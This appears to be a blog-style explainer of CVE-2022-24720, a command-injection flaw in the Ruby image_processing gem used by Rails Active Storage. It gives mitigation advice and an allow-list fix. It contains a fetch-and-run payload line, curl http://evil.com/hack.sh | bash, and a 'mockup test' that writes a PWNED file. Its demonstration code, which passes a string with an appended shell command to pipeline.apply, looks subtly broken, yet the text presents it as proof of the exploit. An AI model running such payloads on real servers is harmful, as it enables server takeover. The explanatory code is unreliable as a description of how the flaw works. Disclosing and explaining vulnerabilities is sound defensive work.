---

What is CVE-2022-24720?

CVE-2022-24720 is a vulnerability discovered in the image_processing gem—an image processing wrapper for libvips and ImageMagick/GraphicsMagick. This is a popular library widely used in Ruby on Rails, especially because it's integrated into Rails's Active Storage system. The vulnerability allows attackers to execute arbitrary shell commands on the server if untrusted input is passed to the #apply method.

Original Disclosure

* GitHub Security Advisory for marcel/image_processing
* CVE-2022-24720 - NVD Details

How Does This Work?

The vulnerability centers on the #apply method, which allows users to apply a series of image operations—like resizing, cropping, or rotating—based on parameters. If these parameters are taken directly from user input and passed unsanitized, an attacker can sneak in shell commands, which the server will unwittingly execute.

Why is Active Storage Affected?

Active Storage, the default file attachment framework in Rails, uses image_processing internally for manipulating images (for example, when generating thumbnails or resizing images). So, even if you never use image_processing directly, your app is probably still affected if you're using Active Storage and accepting image transformation options from users.

Here's a simplified Ruby example of how this vulnerability can work

require "image_processing/mini_magick"

# User provides operations as untrusted input
user_input = "resize_to_limit: [100, 100]; system('ls')"  # Malicious!

# Directly applying user input—VULNERABLE!
pipeline = ImageProcessing::MiniMagick
result = pipeline.apply(user_input)  # This can run arbitrary shell code!

If your app uses code like this (maybe inside an upload handler or controller action), an attacker can supply payloads like:

system('curl http://evil.com/hack.sh | bash')

This results in your server fetching and running arbitrary code from an attacker-controlled site.

Server Executes the Image Processing Pipeline:

If the options are passed into #apply unsanitized, the underlying shell commands contain the attacker’s code.

Attacker Gains Code Execution:

The injected command is run with the permissions of the Rails process, possibly exposing sensitive data or taking over the system.

Confirming the Vulnerability

Here's a mockup test that demonstrates the risk (please only run in a secure and disposable environment):

require "image_processing/mini_magick"
input = "resize_to_limit: [100, 100]; echo PWNED > /tmp/exploit.txt"
pipeline = ImageProcessing::MiniMagick
pipeline.apply(input)
# Now check if /tmp/exploit.txt exists and contains "PWNED"

If you see your file created, you've proved the exploit.

Upgrade image_processing to version 1.12.2 or higher.

- See the changelog

Example of safe handling

ALLOWED_OPERATIONS = %w[resize_to_limit resize_to_fit]
user_ops = params[:operations].select { |op| ALLOWED_OPERATIONS.include?(op[:name]) }
# Now build pipeline from allowed operations only

Conclusion and Recommendations

CVE-2022-24720 is highly critical if your Rails application accepts user-supplied image manipulation parameters (directly or via Active Storage). Left unchecked, it allows complete server takeover.

References

- CVE-2022-24720 (NVD)
- GitHub Advisory: image_processing arbitrary code execution
- image_processing Library
- Rails Active Storage

Timeline

Published on: 03/01/2022 23:15:00 UTC
Last modified on: 03/09/2022 17:58:00 UTC